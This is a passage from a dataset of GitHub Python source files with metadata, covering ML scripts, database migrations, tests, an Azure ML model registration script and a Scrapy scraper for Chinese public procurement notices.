lambda_init=0.01)\n clf_swa.fit(feature_support_swa, y_support)\n pred_y_swa, std_y_swa = clf_swa.predict(feature_query_swa, return_std=True)\n mse_swa = mean_squared_error(y_query, pred_y_swa)\n all_mse_swa.append(mse_swa)\n\n\n # %%\n mse_all_np = np.array(all_mse)\n print('SGD')\n print('Mean MSE: ', mse_all_np.mean())\n print('MSE std: ', mse_all_np.std())\n\n mse_swa_all_np = np.array(all_mse_swa)\n print('SWA')\n print('Mean MSE: ', mse_swa_all_np.mean())\n print('MSE std: ', mse_swa_all_np.std())\n\n\n\n# %%\nfig, ax = plt.subplots()\nax.plot(x_support.cpu(), y_support, 'kx', label='few-shot train')\nax.plot(x_test.cpu(), y_true_test[:, -1], label='true function')\nax.plot(x_query.cpu(), pred_y, '.', label='predicted')\nax.legend()\nplt.show()\n","repo_name":"alexalex222/few_shot_swa_public","sub_path":"nn_multitask_swa.py","file_name":"nn_multitask_swa.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40164310226","text":"\"\"\"empty message\n\nRevision ID: 29999e556a9a\nRevises: None\nCreate Date: 2016-04-01 09:43:11.377387\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '29999e556a9a'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('users')\n op.drop_table('posts')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('posts',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('title', sa.VARCHAR(length=20), nullable=False),\n sa.Column('description', sa.VARCHAR(), nullable=False),\n sa.Column('user_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], [u'user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('users',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('name', sa.TEXT(), nullable=False),\n sa.Column('email', sa.CHAR(length=50), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n","repo_name":"Harrisonkamau/bc-6-ideabox","sub_path":"migrations/versions/29999e556a9a_.py","file_name":"29999e556a9a_.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36907747735","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom ._http import request\n\nif TYPE_CHECKING:\n from typing import List\n\n from .types.topics import Topic\n\n__all__ = (\"get_topics_nearby\",)\n\n\nasync def get_topics_nearby(\n *,\n authorisation_token: str,\n lattitude: float,\n longitude: float,\n) -> List[Topic]:\n \"\"\"\n Gets the topics nearby the lattitude and longitude provided.\n\n Parameters\n ----------\n authorisation_token: :class:`str`\n The authorisation token to send requests with.\n lattitude: :class:`float`\n The lattitude to get the topics for.\n\n .. note::\n This is known as ``lat`` on the API.\n\n longitude: :class:`float`\n The longitude to get the topics for.\n\n .. note::\n This is known as ``lon`` on the API.\n\n Returns\n -------\n List[:class:`.Topic`]\n The topics nearby the lattitude and longitude provided.\n\n .. versionadded:: 1.0\n \"\"\"\n data = await request(\n f\"/topics_nearby?lat={lattitude}&lon={longitude}\",\n authorisation_token=authorisation_token,\n )\n return data[\"topics\"]","repo_name":"spifory/shedding.py","sub_path":"shedding/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"30947022618","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/30 20:05\n# @Author : lihanhan\n# @Email : demo1li@163.com\n# @File : 简单选择排序.py\ndef select_sort(items, comp=lambda x, y: x < y):\n \"\"\"简单选择排序\"\"\"\n items = items[:]\n for i in range(len(items) - 1):\n min_index = i\n for j in range(i + 1, len(items)):\n if comp(items[j], items[min_index]):\n min_index = j\n items[i], items[min_index] = items[min_index], items[i]\n return items\n\nprint(select_sort([1,5,6,9,8,4,4,5,8,10,36]))","repo_name":"createnewdemo/pycharm_pracise1","sub_path":"基础加强/数据结构算法/简单选择排序.py","file_name":"简单选择排序.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"32479195356","text":"import composer.optim\nimport torch.optim\n\n\ndef build_optimizer(config, model):\n \"\"\"\n Build optimizer, set weight decay of normalization to 0 by default.\n \"\"\"\n skip = {}\n\n if hasattr(model, \"no_weight_decay\"):\n skip = model.no_weight_decay()\n\n parameters = set_weight_decay(model, skip)\n\n name = config.optim.name.lower()\n if name == \"sgd\":\n return torch.optim.SGD(\n parameters,\n momentum=config.optim.momentum,\n nesterov=True,\n lr=config.optim.lr,\n weight_decay=config.optim.weight_decay,\n )\n elif name == \"adamw\":\n return torch.optim.AdamW(\n parameters,\n lr=config.optim.lr,\n weight_decay=config.optim.weight_decay,\n )\n elif name == \"decoupledadamw\":\n return composer.optim.DecoupledAdamW(\n parameters,\n lr=config.optim.lr,\n weight_decay=config.optim.weight_decay,\n )\n elif name == \"decoupledsgdw\":\n return composer.optim.DecoupledSGDW(\n parameters,\n lr=config.optim.lr,\n momentum=config.optim.momentum,\n weight_decay=config.optim.weight_decay,\n )\n else:\n raise ValueError(name)\n\n\ndef set_weight_decay(model, skip_list=()):\n has_decay = []\n no_decay = []\n\n for name, param in model.named_parameters():\n if len(param.shape) == 1 or name.endswith(\".bias\") or (name in skip_list):\n no_decay.append(param)\n else:\n has_decay.append(param)\n\n return [{\"params\": has_decay}, {\"params\": no_decay, \"weight_decay\": 0.0}]\n","repo_name":"samuelstevens/hierarchical-vision","sub_path":"optim.py","file_name":"optim.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43863315710","text":"import pytest\nimport os\n\nfrom devassistant import utils\n\nclass TestFindFileInLoadDirs(object):\n fixtures = os.path.join(os.path.dirname(__file__), 'fixtures')\n\n def test_find_ok(self):\n assert utils.find_file_in_load_dirs('files/jinja_template.py') == \\\n os.path.join(self.fixtures, 'files', 'jinja_template.py')\n\n def test_find_not_there(self):\n assert utils.find_file_in_load_dirs('files/does_not_exist') is None\n\n\nclass TestStripPrefix(object):\n\n @pytest.mark.parametrize(('inp', 'prefix', 'out'), [\n ('foobar', 'foo', 'bar'),\n ('foobar', 'bar', 'foobar'),\n ('foobar', 'foobar', ''),\n ('foo', 'foobar', 'foo'),\n ('foo', str(1), 'foo'),\n # Should not strip regex\n ('foobar', 'foo|bar', 'foobar'),\n ('foobar', '[fo]*', 'foobar'),\n ('foobar', '.*', 'foobar'),\n ('foobar', 'fo.', 'foobar'),\n ])\n def test_strip_noregex(self, inp, prefix, out):\n assert utils.strip_prefix(inp, prefix) == out\n\n @pytest.mark.parametrize(('inp', 'prefix', 'out'), [\n ('foobar', 'foo|bar', 'bar'),\n ('foobar', '[fo]*', 'bar'),\n ('foobar', '.*', ''),\n ('foobar', 'fo.', 'bar'),\n ])\n def test_strip_regex(self, inp, prefix, out):\n assert utils.strip_prefix(inp, prefix, regex=True) == out\n\n @pytest.mark.parametrize(('inp', 'prefix'), [\n (1, 'foo'),\n (object(), object()),\n ('foo', None)\n ])\n def test_fails(self, inp, prefix):\n with pytest.raises(TypeError) as e:\n utils.strip_prefix(inp, prefix)\n\n\nclass TestStripSuffix(object):\n\n @pytest.mark.parametrize(('inp', 'suffix', 'out'), [\n ('foobar', 'bar', 'foo'),\n ('foobar', 'r', 'fooba'),\n ('foobar', 'foobar', ''),\n ('foo', 'foobar', 'foo'),\n ('foo', str(1), 'foo'),\n # Should not strip regex\n ('foobar', 'foo|bar', 'foobar'),\n ('foobar', '[ar]*', 'foobar'),\n ('foobar', '.*', 'foobar'),\n ('foobar', '.bar', 'foobar'),\n ])\n def test_strip_noregex(self, inp, suffix, out):\n assert utils.strip_suffix(inp, suffix) == out\n\n @pytest.mark.parametrize(('inp', 'prefix', 'out'), [\n ('foobar', 'foo|bar', 'foo'),\n ('foobar', '[ar]*', 'foob'),\n ('foobar', '.*', ''),\n ('foobar', '.bar', 'fo'),\n ])\n def test_strip_regex(self, inp, prefix, out):\n assert utils.strip_suffix(inp, prefix, regex=True) == out\n\n @pytest.mark.parametrize(('inp', 'suffix'), [\n (1, 'foo'),\n (object(), object()),\n ('foo', None)\n ])\n def test_fails(self, inp, suffix):\n with pytest.raises(TypeError) as e:\n utils.strip_suffix(inp, suffix)\n","repo_name":"devassistant/devassistant","sub_path":"test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"40"} +{"seq_id":"2350886003","text":"import random\n\nfrom pippi import dsp\n\nharp = dsp.read('harp1.wav')\n\nout = dsp.silence(1)\n\nfor grain in harp.grains(100, 1000):\n grain = grain.env('blackman') * random.random()\n out.dub(grain, random.randint(0, 44100))\n\nout.write('harpy.wav')\n","repo_name":"hecanjog/sketches","sub_path":"harps.py","file_name":"harps.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25057428937","text":"import marieclancyProject1\nimport pytest\n\n\n# Test to check if the retrieved list has more than 100 items.\ndef test_get_jobs():\n jobs = marieclancyProject1.get_jobs()\n assert len(jobs) > 100\n assert type(jobs[1]) == dict\n\n\n# Test to check if the stackoverflow list returns more than 350 items.\ndef test_get_stack_jobs():\n jobs = marieclancyProject1.get_data_from_stackoverflow()\n assert len(jobs) > 350\n assert type(jobs[2]) == dict\n\n\ndef test_if_data_in_database_from_stack_over_flow():\n existingLocation = \"Kowloon,Hong Kong\"\n conn, cursor = marieclancyProject1.open_db(\"test.sqlite\")\n marieclancyProject1.setup_db(cursor, conn)\n jobs = marieclancyProject1.get_data_from_stackoverflow()\n for job in jobs:\n marieclancyProject1.insert_to_database(cursor, conn, job)\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.location = ?\", (existingLocation,))\n assert cursor.fetchone()\n marieclancyProject1.close_db(conn)\n\n\ndef test_insert_to_database():\n jobs = marieclancyProject1.get_jobs()\n existingTitle = \"Web Full Stack Engineer\"\n conn, cursor = marieclancyProject1.open_db(\"test.sqlite\")\n marieclancyProject1.setup_db(cursor, conn)\n for job in jobs:\n marieclancyProject1.insert_to_database(cursor, conn, job)\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.title = ?\", (existingTitle,))\n assert cursor.fetchone()\n marieclancyProject1.close_db(conn)\n\n\n# Test to check if the function actually writes a file with the correct data.\ndef test_write_file():\n jobs = marieclancyProject1.get_jobs()\n marieclancyProject1.write_file(jobs)\n titleToExist = \"Web Full Stack Engineer\"\n match = False\n with open('jobs.txt', 'r') as fileOpen:\n for line in fileOpen.readlines():\n if titleToExist in line:\n match = True\n break\n assert match\n\n\ndef test_send_extra_data():\n conn, cursor = marieclancyProject1.open_db(\"test.sqlite\")\n marieclancyProject1.setup_db(cursor, conn)\n extraGoodData = {\n \"id\": \"781\", \"type\": \"yes\", \"url\": \"ok.com\", 'company': 'google',\n 'company_url': 'ok.com123',\n 'created_at': \"March 1, 2019\", 'location': \"USA\", 'title': 'senior designer',\n 'description': \"professional developer needed\",\n 'how_to_apply': \"please visit website\", 'company_logo': \"none\"}\n marieclancyProject1.insert_to_database(cursor, conn, extraGoodData)\n existingID = \"781\"\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.id = ?\", (existingID,))\n assert cursor.fetchone()\n\n # same as above but with fewer arguments\n extraBadData = {\n \"id\": \"782\", \"type\": \"yes\", \"url\": \"ok.com\", 'company': 'google',\n 'title': 'senior designer',\n 'description': \"professional developer needed\",\n 'how_to_apply': \"please visit website\", 'company_logo': \"none\"}\n\n nonExistingID = 782\n marieclancyProject1.insert_to_database(cursor, conn, extraBadData)\n cursor.execute(\"SELECT * FROM jobs WHERE jobs.id = ?\", (nonExistingID,))\n assert cursor.fetchone() is None\n\n marieclancyProject1.close_db(conn)\n","repo_name":"marieclancy2/mclancyJobsProject","sub_path":"Tests/testJobs.py","file_name":"testJobs.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23107310746","text":"#!/usr/bin/env python3\n\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='crownstone-sdk',\n version=\"1.0.0\",\n packages=find_packages(exclude=[\"examples\",\"testing\"]),\n author=\"Crownstone B.V.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/crownstone/crownstone-python-sdk\",\n install_requires=list(package.strip() for package in open('requirements.txt')),\n scripts=[\n 'tools/cs_dfu_write_application',\n 'tools/cs_scan_any_crownstone',\n 'tools/cs_scan_for_alternative_state',\n 'tools/cs_scan_known_crownstones',\n 'tools/cs_switch_crownstone',\n 'tools/cs_microapp_enable',\n 'tools/cs_microapp_upload',\n 'tools/cs_microapp_message',\n 'tools/cs_setup_crownstone',\n 'tools/cs_factory_reset_crownstone',\n ],\n classifiers=[\n 'Programming Language :: Python :: 3.7'\n ],\n python_requires='>=3.7',\n)\n","repo_name":"crownstone/crownstone-python-sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28606262627","text":"# 3) Пользователь вводит месяц в виде целого числа от 1 до 12. Сообщить к какому времени года\n# относится месяц (зима, весна, лето, осень). Напишите решения через list и через dict.\n\nseasons_number = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\nseasons_time_year = {0: 'зима', 1: 'зима', 2: 'весна', 3: 'весна', 4: 'весна', 5: 'лето', 6: 'лето', 7: 'лето', 8: 'осень', 9: 'осень', 10: 'осень', 11: 'зима'}\nmonth = input('введите месяц пж: ')\ncount_attempts = 0\n\nwhile type(month) != int or count_attempts < 5:\n try:\n month = int(month)\n if month > 12 or month <= 0:\n print('такого месяц нет')\n raise Exception\n break\n except(ValueError, Exception):\n print('что-то не так')\n count_attempts += 1\n month = input('введите месяц пж: ')\n\nprint(seasons_time_year.get(seasons_number.index(month)))\n","repo_name":"egorgasa/for_you","sub_path":"lesson2/l3.py","file_name":"l3.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72796534521","text":"import sys\r\nimport os.path\r\nimport argparse\r\nfrom azureml.core import Workspace\r\nfrom azureml.core.model import Model\r\nfrom azureml.core.authentication import ServicePrincipalAuthentication\r\n\r\n\r\nPARSER = argparse.ArgumentParser()\r\nPARSER.add_argument('--AZUREML_RUN_TOKEN')\r\nPARSER.add_argument('--AZUREML_RUN_ID')\r\nPARSER.add_argument('--AZUREML_ARM_SUBSCRIPTION')\r\nPARSER.add_argument('--AZUREML_ARM_RESOURCEGROUP')\r\nPARSER.add_argument('--AZUREML_ARM_WORKSPACE_NAME')\r\nPARSER.add_argument('--AZUREML_ARM_PROJECT_NAME')\r\nPARSER.add_argument('--AZUREML_SCRIPT_DIRECTORY_NAME')\r\nPARSER.add_argument('--AZUREML_RUN_TOKEN_EXPIRY')\r\nPARSER.add_argument('--AZUREML_SERVICE_ENDPOINT')\r\nPARSER.add_argument('--MODEL_PATH')\r\nPARSER.add_argument('--MODEL_NAME')\r\nPARSER.add_argument('--TENANT_ID')\r\nPARSER.add_argument('--APP_ID')\r\nPARSER.add_argument('--APP_SECRET')\r\n\r\nARGS = PARSER.parse_args()\r\n\r\nTENANT_ID = ARGS.TENANT_ID\r\nAPP_ID = ARGS.APP_ID\r\nAPP_SECRET = ARGS.APP_SECRET\r\nWORKSPACE_NAME = ARGS.AZUREML_ARM_WORKSPACE_NAME\r\nSUBSCRIPTION_ID = ARGS.AZUREML_ARM_SUBSCRIPTION\r\nRESOURCE_GROUP = ARGS.AZUREML_ARM_RESOURCEGROUP\r\nMODEL_PATH = ARGS.MODEL_PATH\r\nMODEL_NAME = ARGS.MODEL_NAME\r\n\r\nif os.path.isfile(MODEL_PATH) is False:\r\n print(\"The given model path %s is invalid\" % (MODEL_PATH))\r\n sys.exit(1)\r\n\r\nSP_AUTH = ServicePrincipalAuthentication(\r\n tenant_id=TENANT_ID,\r\n service_principal_id=APP_ID,\r\n service_principal_password=APP_SECRET)\r\n\r\nWORKSPACE = Workspace.get(\r\n WORKSPACE_NAME,\r\n SP_AUTH,\r\n SUBSCRIPTION_ID,\r\n RESOURCE_GROUP\r\n)\r\n\r\ntry:\r\n MODEL = Model.register(\r\n model_path=MODEL_PATH,\r\n model_name=MODEL_NAME,\r\n description=\"Fashion MNIST\",\r\n workspace=WORKSPACE)\r\n\r\n print(\"Model registered successfully. ID: \" + MODEL.id)\r\nexcept Exception as caught_error:\r\n print(\"Error while registering the model: \" + str(caught_error))\r\n sys.exit(1)\r\n","repo_name":"Azure-Samples/MLOpsDatabricks","sub_path":"aml_service/experiment/register_model.py","file_name":"register_model.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"40"} +{"seq_id":"40708833469","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@file :province_67_yangguangyizhao_spider.py\n@description :阳光易招公共资源交易平台\n@date :2021/05/31 10:21:05\n@author :miaokela\n@version :1.0\n\"\"\"\nimport scrapy\nimport re\nimport requests\nfrom lxml import etree\nfrom datetime import datetime\nimport random\nfrom collections import OrderedDict\n\nfrom spider_pro import items, constans, utils\n\n\nclass Province67YangguangyizhaoSpiderSpider(scrapy.Spider):\n name = 'province_67_yangguangyizhao_spider'\n allowed_domains = ['www.sunbidding.com']\n start_urls = ['http://www.sunbidding.com/']\n query_url = 'http://www.sunbidding.com'\n area_id = 67\n basic_area = '河南省-阳光易招公共资源交易平台'\n keywords_map = OrderedDict({\n '征求意见': '招标预告',\n '单一来源|询价': '招标公告',\n '资格审查': '资格预审结果公告',\n '澄清|变成|补充|取消|更正|延期': '招标变更',\n '流标|废标|终止|中止': '招标异常',\n '评标公示|候选人': '中标预告',\n '评审公示': '其他公告',\n })\n url_map = {\n '房建市政': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jzbgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jscqgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jbggg/index.jhtml'},\n {'notice_type': '中标预告', 'url': 'http://www.sunbidding.com/jypbgs/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/jszbgg/index.jhtml'},\n ],\n '政府采购': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/zcggg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/zfcqgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/zbggg/index.jhtml'},\n {'notice_type': '其他公告', 'url': 'http://www.sunbidding.com/zpsgs/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/zfzbgg/index.jhtml'},\n ],\n '企业采购': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jqcgg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jqccq/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jqcbg/index.jhtml'},\n {'notice_type': '其他公告', 'url': 'http://www.sunbidding.com/jqcps/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/jqczb/index.jhtml'},\n ],\n '医疗卫生': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/yycggg/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/yybggg/index.jhtml'},\n {'notice_type': '其他公告', 'url': 'http://www.sunbidding.com/yypsgs/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/yyzbgg/index.jhtml'},\n ],\n '交通': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jjtzb/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jjtbg/index.jhtml'},\n {'notice_type': '中标预告', 'url': 'http://www.sunbidding.com/jjtpb/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/jjtjg/index.jhtml'},\n ],\n '水利': [\n {'notice_type': '招标公告', 'url': 'http://www.sunbidding.com/jslzb/index.jhtml'},\n {'notice_type': '招标变更', 'url': 'http://www.sunbidding.com/jslbg/index.jhtml'},\n {'notice_type': '中标预告', 'url': 'http://www.sunbidding.com/jslpb/index.jhtml'},\n {'notice_type': '中标公告', 'url': 'http://www.sunbidding.com/jsljg/index.jhtml'},\n ]\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n self.start_time = kwargs.get('sdt', '')\n self.end_time = kwargs.get('edt', '')\n\n @staticmethod\n def get_headers(resp):\n default_headers = resp.request.headers\n headers = {k: random.choice(v) if all([isinstance(v, list), v]) else v for k, v in default_headers.items()}\n return headers\n\n def judge_in_interval(self, url, method='GET', resp=None, ancestor_el='table', ancestor_attr='id', ancestor_val='',\n child_el='tr', time_sep='-', doc_type='html', **kwargs):\n \"\"\"\n 判断最末一条数据是否在区间内\n Args:\n resp: scrapy请求响应\n url: 分页链接\n method: 请求方式\n ancestor_el: 祖先元素\n ancestor_attr: 属性\n ancestor_val: 属性值\n child_el: 子孙元素\n time_sep: 时间中间分隔符 默认:-\n doc_type: 文档类型\n **kwargs:\n @data: POST请求体\n @enhance_els: 扩展xpath匹配子节点细节['table', 'tbody'] 连续节点\n Returns:\n status: 结果状态\n 1 首条在区间内 可抓、可以翻页\n 0 首条不在区间内 停止翻页\n 2 末条大于最大时间 continue\n \"\"\"\n proxy = resp.meta.get('proxy', None)\n proxies = None\n if proxy:\n if proxy.startswith('https'):\n proxies = {\n 'https': proxy,\n }\n else:\n proxies = {\n 'http': proxy,\n }\n status = 0\n headers = Province67YangguangyizhaoSpiderSpider.get_headers(resp)\n if all([self.start_time, self.end_time]):\n try:\n text = ''\n if method == 'GET':\n text = requests.get(url=url, headers=headers, proxies=proxies if proxies else None).text\n if method == 'POST':\n text = requests.post(url=url, data=kwargs.get(\n 'data'), headers=headers, proxies=proxies if proxies else None).text\n if text:\n els = []\n if doc_type == 'html':\n doc = etree.HTML(text)\n\n # enhance_els\n enhance_els = kwargs.get('enhance_els', [])\n\n enhance_condition = ''\n if enhance_els:\n for enhance_el in enhance_els:\n enhance_condition += '/{0}'.format(enhance_el)\n\n _path = '//{ancestor_el}[@{ancestor_attr}=\"{ancestor_val}\"]{enhance_condition}//{child_el}[last()]/text()[not(normalize-space()=\"\")]'.format(\n **{\n 'ancestor_el': ancestor_el,\n 'ancestor_attr': ancestor_attr,\n 'ancestor_val': ancestor_val,\n 'child_el': child_el,\n 'enhance_condition': enhance_condition\n })\n els = doc.xpath(_path)\n if doc_type == 'xml':\n doc = etree.XML(text)\n _path = '//{child_el}/text()'.format(**{\n 'child_el': child_el,\n })\n els = doc.xpath(_path)\n if els:\n first_el = els[0]\n final_el = els[-1]\n\n # 解析出时间\n t_com = re.compile(r'(\\d+%s\\d+%s\\d+)' %\n (time_sep, time_sep))\n\n first_pub_time = t_com.findall(first_el)\n final_pub_time = t_com.findall(final_el)\n\n if all([first_pub_time, final_pub_time]):\n first_pub_time = datetime.strptime(\n first_pub_time[0], '%Y{0}%m{1}%d'.format(\n time_sep, time_sep)\n )\n final_pub_time = datetime.strptime(\n final_pub_time[0], '%Y{0}%m{1}%d'.format(\n time_sep, time_sep)\n )\n start_time = datetime.strptime(\n self.start_time, '%Y-%m-%d')\n end_time = datetime.strptime(\n self.end_time, '%Y-%m-%d')\n # 比最大时间大 continue\n # 比最小时间小 break\n # 1 首条在区间内 可抓、可以翻页\n # 0 首条不在区间内 停止翻页\n # 2 末条大于最大时间 continue\n if first_pub_time < start_time:\n status = 0\n elif final_pub_time > end_time:\n status = 2\n else:\n status = 1\n except Exception as e:\n self.logger.info(e)\n else:\n status = 1 # 没有传递时间\n return status\n\n def match_title(self, title_name):\n \"\"\"\n 根据标题匹配关键字 返回招标类别\n Args:\n title_name: 标题\n\n Returns:\n notice_type: 招标类别\n \"\"\"\n matched = False\n notice_type = ''\n for keywords, value in self.keywords_map.items():\n if re.search(keywords, title_name):\n notice_type = value\n matched = True\n break\n return matched, notice_type\n\n def start_requests(self):\n for category_type, urls_data in self.url_map.items():\n for url_data in urls_data:\n url = url_data['url']\n notice_type = url_data['notice_type']\n\n yield scrapy.Request(url=url, callback=self.get_max_page, meta={\n 'category_type': category_type,\n 'notice_type': notice_type\n }, cb_kwargs={\n 'url': url,\n })\n\n def get_max_page(self, resp, url):\n \"\"\"\n 获取总页数\n \"\"\"\n page_string = resp.xpath('//div[@class=\"TxtCenter\"]/div/text()[1]').get().strip()\n max_page_com = re.compile(r'/(\\d+)页') # 共1169条记录 1/65页\n max_pages = max_page_com.findall(page_string)\n if max_pages:\n max_page = max_pages[0]\n try:\n max_page = int(max_page)\n except ValueError as e:\n self.log(e)\n else:\n for page in range(1, max_page + 1):\n c_url = url.replace('index', 'index_{0}'.format(page)) if page > 1 else url\n # 最末一条符合时间区间则翻页\n # 解析详情页时再次根据区间判断去采集\n judge_status = self.judge_in_interval(\n c_url, method='GET', ancestor_el='div', ancestor_attr='class', ancestor_val='infolist-main',\n child_el='em', resp=resp,\n )\n if judge_status == 0:\n break\n elif judge_status == 2:\n continue\n else:\n yield scrapy.Request(url=c_url, callback=self.parse_list, meta={\n 'notice_type': resp.meta.get('notice_type', ''),\n 'category_type': resp.meta.get('category_type', '')\n }, priority=max_page - page, dont_filter=True)\n\n def parse_list(self, resp):\n \"\"\"\n 获取详情页链接与发布时间\n \"\"\"\n els = resp.xpath('//div[@class=\"infolist-main\"]//a')\n for n, el in enumerate(els):\n href = el.xpath(\"./@href\").get()\n if href:\n pub_time = el.xpath(\"./em/text()\").get()\n url = ''.join([self.query_url, href])\n if utils.check_range_time(self.start_time, self.end_time, pub_time)[0]:\n yield scrapy.Request(url=url, callback=self.parse_detail, meta={\n 'notice_type': resp.meta.get('notice_type'),\n 'category_type': resp.meta.get('category_type'),\n 'pub_time': pub_time,\n }, priority=(len(els) - n) * 1000)\n\n def parse_detail(self, resp):\n content = resp.xpath('//div[@class=\"s_content\"]').get()\n title_name = resp.xpath('//h2/text()').get()\n notice_type_ori = resp.meta.get('notice_type')\n\n # _, content = utils.remove_specific_element(content, 'a', 'href', 'javascript:window.close()')\n\n # 关键字重新匹配 notice_type\n matched, match_notice_type = self.match_title(title_name)\n if matched:\n notice_type_ori = match_notice_type\n\n notice_types = list(\n filter(lambda k: constans.TYPE_NOTICE_DICT[k] == notice_type_ori, constans.TYPE_NOTICE_DICT)\n )\n\n # 匹配文件\n _, files_path = utils.catch_files(content, self.query_url, resp=resp)\n\n notice_item = items.NoticesItem()\n notice_item[\"origin\"] = resp.url\n\n notice_item[\"title_name\"] = title_name.strip() if title_name else ''\n notice_item[\"pub_time\"] = resp.meta.get('pub_time')\n\n notice_item[\"info_source\"] = self.basic_area\n notice_item[\"is_have_file\"] = constans.TYPE_HAVE_FILE if files_path else constans.TYPE_NOT_HAVE_FILE\n notice_item[\"files_path\"] = files_path\n notice_item[\"notice_type\"] = notice_types[0] if notice_types else constans.TYPE_UNKNOWN_NOTICE\n notice_item[\"content\"] = content\n notice_item[\"area_id\"] = self.area_id\n notice_item[\"category\"] = resp.meta.get('category_type')\n print(resp.meta.get('pub_time'), resp.url)\n\n return notice_item\n\n\nif __name__ == \"__main__\":\n from scrapy import cmdline\n\n cmdline.execute(\n \"scrapy crawl province_67_yangguangyizhao_spider -a sdt=2021-08-09 -a edt=2021-08-09\".split(\" \")\n )\n # cmdline.execute(\"scrapy crawl province_67_yangguangyizhao_spider\".split(\" \"))\n","repo_name":"LC-123456-git/ztc_spider","sub_path":"spider_pro/spiders/province_67_yangguangyizhao_spider.py","file_name":"province_67_yangguangyizhao_spider.py","file_ext":"py","file_size_in_byte":14627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42421118004","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\n\nimport os\n\nfrom gps.lib.formats.GpxParser import GpxParser\nfrom gps.lib.gpsObserver import GpxObserver\n\nfrom gps.lib.formats.gpxWriter import gpxWriter\n\n\nclass WaypointDB(object):\n \"\"\"\n Models dir structure of waypoints with a directory\n which is its distance threshold, e.g:\n\n ~/GPS_Tracks/Waypoints/10/pubs.gpx\n ~/GPS_Tracks/Waypoints/20/cafes.gpx\n \"\"\"\n\n # ~/GPS_Tracks/Waypoints\n\n def __init__(self):\n self.base_directory = os.path.join(os.path.expanduser(\"~\"), \"GPS_Tracks\", \"Waypoints\")\n\n self.wps = []\n\n self.scan_directory(self.base_directory)\n\n def scan_directory(self, base_directory):\n\n for dirpath, dirnames, filenames in os.walk(base_directory):\n for filename in filenames:\n if os.path.splitext(filename)[1] == \".gpx\":\n self.add_file(os.path.join(dirpath, filename),\n os.path.basename(dirpath))\n\n def add_file(self, filename, distance):\n self.wps.append([filename, int(distance)])\n\n def get(self):\n for wp in self.wps:\n yield wp\n\n\nif __name__ == 